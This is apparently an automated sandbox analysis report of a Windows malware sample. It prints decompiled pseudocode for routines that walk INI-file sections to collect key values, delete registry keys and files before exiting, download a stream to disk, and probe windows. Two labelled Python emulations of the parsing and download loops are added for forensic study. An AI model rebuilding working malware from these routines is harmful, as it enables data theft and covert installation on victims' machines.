    • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 00407536
    • SetLastError.KERNEL32(00002EE4), ref: 0040758C
    • LeaveCriticalSection.KERNEL32(004228C0), ref: 004075F5
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
    • String ID:
    • API String ID: 3653105453-0
    • Opcode ID: 4a13edeeb850a7961acd6c95301c3be1b7e6d07d653a927e79f071652090d879
    • Instruction ID: f634e7a2cd9eb5320d373ebb015850e5a319f3bfc28240e608c8b8cfa7937eae
    • Opcode Fuzzy Hash: 4a13edeeb850a7961acd6c95301c3be1b7e6d07d653a927e79f071652090d879
    • Instruction Fuzzy Hash: 04516071904209ABDF10AF65CC85ADE7BB4AF04354F04416AF824BB2D1D778ED85CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040B012(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				short* _v16;
    				WCHAR* _v20;
    				short _v32;
    				short _v48;
    				short _v68;
    				short _v88;
    				short _v112;
    				char _v144;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t40;
    				long _t41;
    				void* _t48;
    				void* _t50;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t61;
    				WCHAR* _t64;
    				void* _t72;
    				void* _t76;
    				WCHAR* _t83;
    				WCHAR* _t84;
    				WCHAR* _t86;
    				intOrPtr _t96;
    				void* _t97;
    
    				_t81 = __edx;
    				_t40 = E00416378(0x1fffe);
    				_t86 = _t40;
    				_v20 = _t86;
    				if(_t86 == 0) {
    					return _t40;
    				}
    				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
    				if(_t41 <= 0) {
    					L17:
    					return E004163A8(_t86);
    				}
    				_t3 = _t41 + 1; // 0x1
    				if(E00417258(_t86, _t3) == 0) {
    					goto L17;
    				}
    				_t83 = E00416378(0xc08);
    				_v12 = _t83;
    				if(_t83 == 0) {
    					goto L17;
    				} else {
    					_t5 =  &(_t83[0x2fd]); // 0x5fa
    					_v16 = _t5;
    					_v8 = _t86;
    					_t48 = 0x65;
    					E0040FA33(_t48,  &_v112);
    					_t50 = 0x66;
    					E0040FA33(_t50,  &_v48);
    					_t52 = 0x67;
    					E0040FA33(_t52,  &_v32);
    					_t54 = 0x68;
    					E0040FA33(_t54,  &_v88);
    					_t56 = 0x69;
    					E0040FA33(_t56,  &_v68);
    					goto L6;
    					L15:
    					_t61 = E00417294(_v8, 1);
    					_v8 = _t61;
    					if(_t61 != 0) {
    						_t83 = _v12;
    						L6:
    						if(StrStrIW(_v8,  &_v112) == 0) {
    							_t64 = StrStrIW(_v8,  &_v48);
    							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
    								_t84 =  &(_t83[0xff]);
    								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
    									_t26 =  &(_t84[0xff]); // 0x0
    									_t94 = _t26;
    									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040AEA7(_t81, _t94) > 0) {
    										_t95 =  &_v144;
    										_t72 = 0x56;
    										E0040FA33(_t72,  &_v144);
    										_push(_v12);
    										_t30 =  &(_t84[0xff]); // 0x0
    										_push(_t84);
    										_t85 = _v16;
    										_t81 = 0x307;
    										_t76 = E0041709B(_t95, 0x307, _v16, _t95);
    										_t97 = _t97 + 0x10;
    										if(_t76 > 0) {
    											_t96 = _a8;
    											if(E0041679C(_t76, _t96, _t85) != 0) {
    												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L15;
    					} else {
    						E004163A8(_v12);
    						_t86 = _v20;
    						goto L17;
    					}
    				}
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x0040b012, 0x0040b023, 0x0040b028, 0x0040b02c, 0x0040b031, 0x0040b1b2, 0x0040b1b2, 0x0040b049,
    0x0040b04d, 0x0040b1a8, 0x00000000, 0x0040b1a9, 0x0040b053, 0x0040b05f, 0x00000000, 0x00000000,
    0x0040b06f, 0x0040b071, 0x0040b076, 0x00000000, 0x0040b07c, 0x0040b07c, 0x0040b084, 0x0040b087,
    0x0040b08d, 0x0040b08e, 0x0040b098, 0x0040b099, 0x0040b0a3, 0x0040b0a4, 0x0040b0ae, 0x0040b0af,
    0x0040b0b9, 0x0040b0ba, 0x0040b0bf, 0x0040b188, 0x0040b18d, 0x0040b192, 0x0040b197, 0x0040b0c1,
    0x0040b0c4, 0x0040b0d5, 0x0040b0e2, 0x0040b0e6, 0x0040b10b, 0x0040b120, 0x0040b129, 0x0040b129,
    0x0040b13a, 0x0040b148, 0x0040b14e, 0x0040b14f, 0x0040b154, 0x0040b157, 0x0040b15e, 0x0040b15f,
    0x0040b165, 0x0040b16a, 0x0040b16f, 0x0040b174, 0x0040b176, 0x0040b183, 0x0040b185, 0x0040b185,
    0x0040b183, 0x0040b174, 0x0040b13a, 0x0040b120, 0x0040b0e6, 0x00000000, 0x0040b19d, 0x0040b1a0,
    0x0040b1a5, 0x00000000, 0x0040b1a5, 0x0040b197

    APIs
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B049
      • Part of subcall function 00416378: HeapAlloc.KERNEL32(00000008,-00000004,00417B46,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00416389
    • StrStrIW.SHLWAPI(?,?), ref: 0040B0D1
    • StrStrIW.SHLWAPI(?,?), ref: 0040B0E2
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B0FE
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B11C
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B136
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PrivateProfileString$AllocHeap
    • String ID:
    • API String ID: 2479592106-0
    • Opcode ID: 4155c42cfd0bdbc29c4bf0db0c02c532cedbcc59721b92ebdde21a812e68500f
    • Instruction ID: f5205f1fe6ec4e8460834a020c65dcf1444f25a8ddc89874f208227f25288c3b
    • Opcode Fuzzy Hash: 4155c42cfd0bdbc29c4bf0db0c02c532cedbcc59721b92ebdde21a812e68500f
    • Instruction Fuzzy Hash: 7C418F3290021ABADF10DBA5CC01AEFBB79EF44754F114076B914F7291D739AE068B98
    Uniqueness

    Uniqueness Score: -1.00%
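
    Added example (not code from the report or from the sample itself): a pure-Python emulation of the section walk that E0040B409 and E0040B012 above perform with GetPrivateProfileStringW, GetPrivateProfileIntW, StrStrIW and the E00417294 string stepping. It reproduces the Win32 semantics the two loops depend on: the NULL/NULL section enumeration into a 0xFFFF-WCHAR buffer (NUL-separated, double-NUL terminated, truncated when the buffer is too small), the 0xFF-WCHAR per-key reads whose zero return skips the section, the 0x15 default and the 1..0xFFFF range check on the integer key in E0040B409, the skip-on-marker test, and the append-and-count result. The key names ("name", "target", "data", "count"), the markers ("skip", "off"), the record layout and the non-empty validator are assumptions: the real strings are decrypted at run time by E0040FA33 and the validators E00416EF7 / E0040AEA7 are not shown in the report. SAMPLE_INI is constructed.

```python
# Added example (not code from the report): pure-Python emulation of the
# INI-section walk shared by E0040B409 and E0040B012. Key names, marker
# strings and the record layout are placeholders (the real strings are
# decrypted at run time by E0040FA33 and never appear in the report); the
# validators E00416EF7 / E0040AEA7 are modelled as "value is non-empty".
DEFAULT_INT = 0x15            # default passed to GetPrivateProfileIntW in E0040B409
SECTION_BUF_WCHARS = 0xFFFF   # nSize of the section-name enumeration buffer
VALUE_BUF_WCHARS = 0xFF       # nSize of every per-key read

def parse_ini(text):
    # Minimal INI reader: sections in file order, keys stored lower-cased
    # (the Win32 API matches names case-insensitively), ';' starts a comment.
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def section_name_buffer(ini, nsize=SECTION_BUF_WCHARS):
    # GetPrivateProfileStringW(NULL, NULL, NULL, buf, nsize, file): every section
    # name NUL-terminated, then a second NUL; too small a buffer cuts the list
    # at nsize-2 characters.
    buf = "".join(name + "\0" for name in ini)
    if len(buf) + 1 > nsize:
        buf = buf[: nsize - 2] + "\0"
    return buf + "\0"

def walk_double_nul(buf):
    # The E00417294(p, 1) stepping used by both loops: yield each string until
    # the empty string that terminates the list.
    pos = 0
    while pos < len(buf) and buf[pos] != "\0":
        end = buf.index("\0", pos)
        yield buf[pos:end]
        pos = end + 1

def get_string(ini, section, key, nsize=VALUE_BUF_WCHARS):
    # GetPrivateProfileStringW with a NULL default: '' when the key is absent
    # (the "returned 0" branch in the report), else the value cut to nsize-1.
    return ini.get(section, {}).get(key.lower(), "")[: nsize - 1]

def get_int(ini, section, key, default=DEFAULT_INT):
    # GetPrivateProfileIntW: default when absent, leading optionally signed
    # decimal digits otherwise, 0 when nothing parses.
    raw = ini.get(section, {}).get(key.lower())
    if raw is None:
        return default
    raw = raw.strip()
    sign = -1 if raw.startswith("-") else 1
    digits = ""
    for ch in raw.lstrip("+-"):
        if not ch.isdigit():
            break
        digits += ch
    return sign * int(digits) if digits else 0

def collect_entries(ini_text, markers, string_keys, int_key, validator):
    # Loop body shared by E0040B409 (int_key set) and E0040B012 (int_key None);
    # the returned list is the caller's list, len() is its counter at +4.
    ini, records = parse_ini(ini_text), []
    for section in walk_double_nul(section_name_buffer(ini)):
        if any(m.lower() in section.lower() for m in markers):
            continue                      # StrStrIW(section, marker) != NULL
        values = [get_string(ini, section, k) for k in string_keys]
        if not all(values) or not validator(values[-1]):
            continue                      # a key read returned 0 / validator failed
        if int_key is None:
            records.append("|".join([section, *values]))
            continue
        n = get_int(ini, section, int_key)
        if not 1 <= n <= 0xFFFF:          # the report's (n - 1) <= 0xFFFE, unsigned
            continue
        records.append("|".join([section, str(n), *values]))
    return records

def entries_0040b409(ini_text):
    # placeholder names for the decrypted strings 0x72..0x76 (assumption)
    return collect_entries(ini_text, ("skip",), ("name", "target", "data"),
                           "count", lambda v: len(v) > 0)

def entries_0040b012(ini_text):
    # placeholder names for the decrypted strings 0x65..0x69 (assumption)
    return collect_entries(ini_text, ("skip", "off"), ("name", "target", "data"),
                           None, lambda v: len(v) > 0)

SAMPLE_INI = (  # constructed sample, not the analysed file's configuration
    "; comment\n[alpha]\nname=first\ntarget=http://example.invalid/a\ndata=abc\ncount=3\n"
    "[beta_skip]\nname=hidden\ntarget=x\ndata=y\n"
    "[delta]\nname=third\ntarget=x\ndata=y\ncount=70000\n"
    "[epsilon_off]\nname=fourth\ntarget=x\ndata=y\n"
    "[zeta]\nname=fifth\ntarget=x\n"
)
```

    entries_0040b409(SAMPLE_INI) yields two records: the section whose count (70000) is outside 1..0xFFFF and the section missing its third key are dropped, and the section without a count gets the 0x15 default. entries_0040b012(SAMPLE_INI) also drops the section matching the second marker but keeps the one E0040B409 rejected on the integer, because it reads no integer key. A configuration recovered from memory can be fed to the same functions once the real key names are known.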

    C-Code - Quality: 79%
    			E004098DC(void* __ebx, void* __ecx, void* __eflags) {
    				char _v1168;
    				char _v1668;
    				char _v1680;
    				short _v1688;
    				char _v2192;
    				short _v2208;
    				char _v2720;
    				char _v2728;
    				char _v2992;
    				char _v3072;
    				void* __edi;
    				void* __esi;
    				void* _t34;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t52;
    				void* _t65;
    
    				_t65 = __eflags;
    				_t46 = __ecx;
    				_t50 =  &_v1668;
    				E0040F0DC(__ecx, _t50, 1);
    				PathRemoveFileSpecW(_t50);
    				_t51 =  &_v2192;
    				E0040F0DC(_t46, _t51, 2);
    				PathRemoveFileSpecW(_t51);
    				 *0x422b98 =  *0x422b98 | 0x00000002;
    				_push(0);
    				E00408E22();
    				E0040FBCD(_t46, _t65);
    				E0041BA18( &_v1680, _t65);
    				E0041BA18(_t51, _t65);
    				_t52 =  &_v2720;
    				E0040F0DC(_t51, _t52, 3);
    				SHDeleteKeyW(0x80000001, _t52);
    				CharToOemW( &_v1688,  &_v2728);
    				CharToOemW( &_v2208,  &_v2992);
    				_t53 =  &_v3072;
    				_t34 = 7;
    				E0040F9FD(_t34,  &_v3072);
    				_push( &_v2992);
    				_push( &_v2728);
    				_push( &_v2992);
    				_push( &_v2728);
    				if(E004170DF( &_v3072, 0x474,  &_v1168, _t53) > 0) {
    					E00417E68(__ebx, 0x474,  &_v1168);
    				}
    				if( *0x423060 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x004098dc, 0x004098dc, 0x004098ec, 0x004098f3, 0x00409901, 0x00409905, 0x0040990c, 0x00409914,
    0x00409916, 0x0040991d, 0x0040991f, 0x00409924, 0x00409930, 0x00409937, 0x0040993e, 0x00409945,
    0x00409952, 0x0040996e, 0x0040997d, 0x00409981, 0x00409985, 0x00409986, 0x0040998f, 0x00409997,
    0x0040999c, 0x004099a4, 0x004099be, 0x004099c3, 0x004099c3, 0x004099cf, 0x004099d3, 0x004099d3,
    0x004099e0

    APIs
      • Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155
    • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00409901
    • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00409914
      • Part of subcall function 00408E22: SetEvent.KERNEL32(00409924,00000000), ref: 00408E28
      • Part of subcall function 00408E22: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00408E3B
      • Part of subcall function 0040FBCD: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 0040FC0A
      • Part of subcall function 0040FBCD: Sleep.KERNEL32(000001F4), ref: 0040FC19
      • Part of subcall function 0040FBCD: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040FC2F
      • Part of subcall function 0041BA18: FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041BA49
      • Part of subcall function 0041BA18: FindNextFileW.KERNEL32(00000000,?), ref: 0041BAA4
      • Part of subcall function 0041BA18: FindClose.KERNEL32(00000000), ref: 0041BAAF
      • Part of subcall function 0041BA18: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 0041BABB
      • Part of subcall function 0041BA18: RemoveDirectoryW.KERNEL32(?), ref: 0041BAC2
    • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00409952
    • CharToOemW.USER32 ref: 0040996E
    • CharToOemW.USER32 ref: 0040997D
    • ExitProcess.KERNEL32 ref: 004099D3
      • Part of subcall function 00417E68: CharToOemW.USER32 ref: 00417E98
      • Part of subcall function 00417E68: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F1C
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
    • String ID:
    • API String ID: 1572960351-0
    • Opcode ID: a66739d422e66c3b43576e997377683fcc932ab4a42c9d7a0a85915b2ba2f5b7
    • Instruction ID: 52cf3ec1648781b87182aa8342fda6cffcc4596da0b71f98ca6b7022099ce99f
    • Opcode Fuzzy Hash: a66739d422e66c3b43576e997377683fcc932ab4a42c9d7a0a85915b2ba2f5b7
    • Instruction Fuzzy Hash: A221A472908344ABD230A765DC06FDB77ACDB84310F00493FB558E7191DB74A905CBD6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004181EA(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E00416378(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E0041B705(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E004163A8(_v20);
    				goto L13;
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x00418207, 0x00418210, 0x00418215, 0x004182b5, 0x004182bb, 0x004182bb, 0x00418220, 0x00418225,
    0x0041822a, 0x004182a1, 0x004182a2, 0x004182ab, 0x004182b0, 0x004182b0, 0x00000000, 0x004182ab,
    0x0041822c, 0x0041822f, 0x0041825c, 0x00000000, 0x00000000, 0x00418261, 0x0041828f, 0x00418295,
    0x00000000, 0x00418295, 0x00418277, 0x00000000, 0x00000000, 0x00418279, 0x0041827f, 0x00000000,
    0x00000000, 0x00418281, 0x0041828a, 0x00000000, 0x00000000, 0x00000000, 0x0041828c, 0x0041829c,
    0x00000000

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 0041820A
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00418238
    • InternetReadFile.WININET(00001000,?,00001000,?), ref: 00418254
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041826F
    • FlushFileBuffers.KERNEL32(00000000), ref: 0041828F
    • CloseHandle.KERNEL32(00000000), ref: 004182A2
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: 1d859016c156619dcc006059b782e96420a6f5938149c65f7e22e0346d71c55f
    • Instruction ID: b256aa5f8ead9610beaa90fe01409c858e001b3624338cb16b82c082080b139c
    • Opcode Fuzzy Hash: 1d859016c156619dcc006059b782e96420a6f5938149c65f7e22e0346d71c55f
    • Instruction Fuzzy Hash: 8521AF70A00209BFDF129FA0DD84BEE7B79EB04311F1444AAFA11B51A0DB398D849B28
    Uniqueness

    Uniqueness Score: -1.00%
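
    Added example (not code from the report or from the sample): an emulation of the download loop in E004181EA above. The report shows CreateFileW with GENERIC_WRITE, FILE_SHARE_READ and CREATE_ALWAYS, a 0x1000-byte heap buffer, a loop that runs only while the optional event in _a16 is absent or still unsignalled (WaitForSingleObject(..., 0) returning 0x102), an InternetReadFile read per iteration, a zero-length read treated as end of stream (FlushFileBuffers, success flag set), a WriteFile whose written length is compared to the read length, and an abort once the running total exceeds _a12; on every failing exit the handle is closed and E0041B705 is called on the path. In this example the HINTERNET and the event are replaced by in-memory stand-ins, the file by a temp file, and E0041B705 is assumed to delete the partial file.

```python
# Added example (not code from the report): emulation of the download loop in
# E004181EA, with InternetReadFile, the optional stop event and the output file
# replaced by in-memory and temp-file stand-ins. E0041B705, which the report
# calls on the failure path, is assumed to delete the partial file.
import io
import os
import tempfile

CHUNK = 0x1000          # the E00416378(0x1000) read buffer
WAIT_TIMEOUT = 0x102    # WaitForSingleObject(event, 0) while the event is unsignalled

class StopEvent:
    # Stand-in for the optional event handle _a16.
    def __init__(self, signalled=False):
        self.signalled = signalled

    def wait(self, timeout_ms):
        return 0 if self.signalled else WAIT_TIMEOUT

class FakeInternetHandle:
    # Stand-in for the HINTERNET read by InternetReadFile: serves `data` and,
    # when fail_at is set, reports a read error once that many bytes went out.
    def __init__(self, data, fail_at=None):
        self._buf, self._served, self._fail_at = io.BytesIO(data), 0, fail_at

    def read(self, n):
        if self._fail_at is not None and self._served >= self._fail_at:
            return None                       # InternetReadFile returned FALSE
        chunk = self._buf.read(n)
        self._served += len(chunk)
        return chunk

def download_to_file(handle, path, max_size, stop=None):
    # Mirror of E004181EA: True only when the stream ended with a zero-length
    # read and the running total never exceeded max_size; on every other exit
    # the file is closed and removed (the assumed E0041B705 behaviour).
    ok, total = False, 0
    with open(path, "wb") as out:                    # CreateFileW(CREATE_ALWAYS)
        while stop is None or stop.wait(0) == WAIT_TIMEOUT:
            chunk = handle.read(CHUNK)               # InternetReadFile
            if chunk is None:
                break                                # read failed
            if len(chunk) == 0:
                out.flush()                          # FlushFileBuffers
                ok = True                            # end of stream: success
                break
            if out.write(chunk) != len(chunk):       # WriteFile + written-length check
                break
            total += len(chunk)
            if total > max_size:                     # cap is tested after the write
                break
    if not ok:
        os.remove(path)
    return ok

def run_case(data, max_size, stop=None, fail_at=None):
    # Drive one download into a fresh temp file; returns (ok, file_kept, size).
    fd, path = tempfile.mkstemp()
    os.close(fd)
    ok = download_to_file(FakeInternetHandle(data, fail_at), path, max_size, stop)
    kept = os.path.exists(path)
    size = os.path.getsize(path) if kept else -1
    if kept:
        os.remove(path)
    return ok, kept, size

if __name__ == "__main__":
    print(run_case(b"A" * 0x1000, 0x1000))                        # (True, True, 4096)
    print(run_case(b"A" * 0x1001, 0x1000))                        # (False, False, -1)
    print(run_case(b"A" * 0x500, 0x10000, stop=StopEvent(True)))  # (False, False, -1)
```

    Two properties of the loop are worth noting for forensics. The size cap is checked after WriteFile, so a stream that crosses _a12 is written up to and including the crossing chunk before the abort removes the file; a stream of exactly _a12 bytes is kept. And a signalled stop event, a failed read or a short write all take the same path, so a cancelled or truncated download leaves nothing on disk, which is why a partially written payload file is rarely found next to this routine.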

    C-Code - Quality: 92%
    			E0041AADD(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E0041AADD(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x0041aae9, 0x0041aaec, 0x0041aaf1, 0x0041aaf5, 0x0041aaff, 0x0041ab03, 0x0041ab32, 0x0041ab38,
    0x0041ab3f, 0x0041ab90, 0x0041ab92, 0x0041ab92, 0x0041ab41, 0x0041ab4a, 0x0041ab5f, 0x0041ab7a,
    0x0041ab8a, 0x0041ab8a, 0x0041ab34, 0x0041ab34, 0x0041ab34, 0x0041ab32, 0x0041ab9c

    APIs
    • WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 0041AAF9
    • SendMessageTimeoutW.USER32 ref: 0041AB2A
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041AB4E
    • SetWindowLongW.USER32 ref: 0041AB5F
    • GetWindowLongW.USER32(?,000000F0), ref: 0041AB7C
    • SetWindowLongW.USER32 ref: 0041AB8A
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 1d2f1b38cf60882bcc0eac4107d89fa1ff9b6facabf1ff5521594151291d6e59
    • Instruction ID: c72529a55b52859089bac894324b1e45911e0e2ae35aa08dbfe42b91fdee69fc
    • Opcode Fuzzy Hash: 1d2f1b38cf60882bcc0eac4107d89fa1ff9b6facabf1ff5521594151291d6e59
    • Instruction Fuzzy Hash: 6421D571508355ABDB10DF64CC40EAB7B99EB84370F20472AFDA0922E2D678E954CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0041B5BF(signed int __eax, void* __ecx, void** __esi, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    
    				_t33 = __esi;
    				asm("sbb eax, eax");
    				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t33[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						__esi[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *__esi = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
    									VirtualFree( *_t33, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x0041b5bf, 0x0041b5d2, 0x0041b5e4, 0x0041b5ea, 0x0041b5f0, 0x0041b660, 0x0041b660, 0x0041b5f2,
    0x0041b5f7, 0x0041b5ff, 0x0041b657, 0x0041b65a, 0x00000000, 0x0041b606, 0x0041b606, 0x0041b609,
    0x0041b60e, 0x0041b61f, 0x0041b625, 0x0041b629, 0x00000000, 0x0041b62b, 0x0041b63f, 0x0041b651,
    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0041b63f, 0x0041b610, 0x0041b610, 0x0041b612,
    0x0041b612, 0x0041b612, 0x0041b60e, 0x0041b5ff, 0x0041b664

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5E4
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5F7
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B61F
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B637
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B651
    • CloseHandle.KERNEL32(?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B65A
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
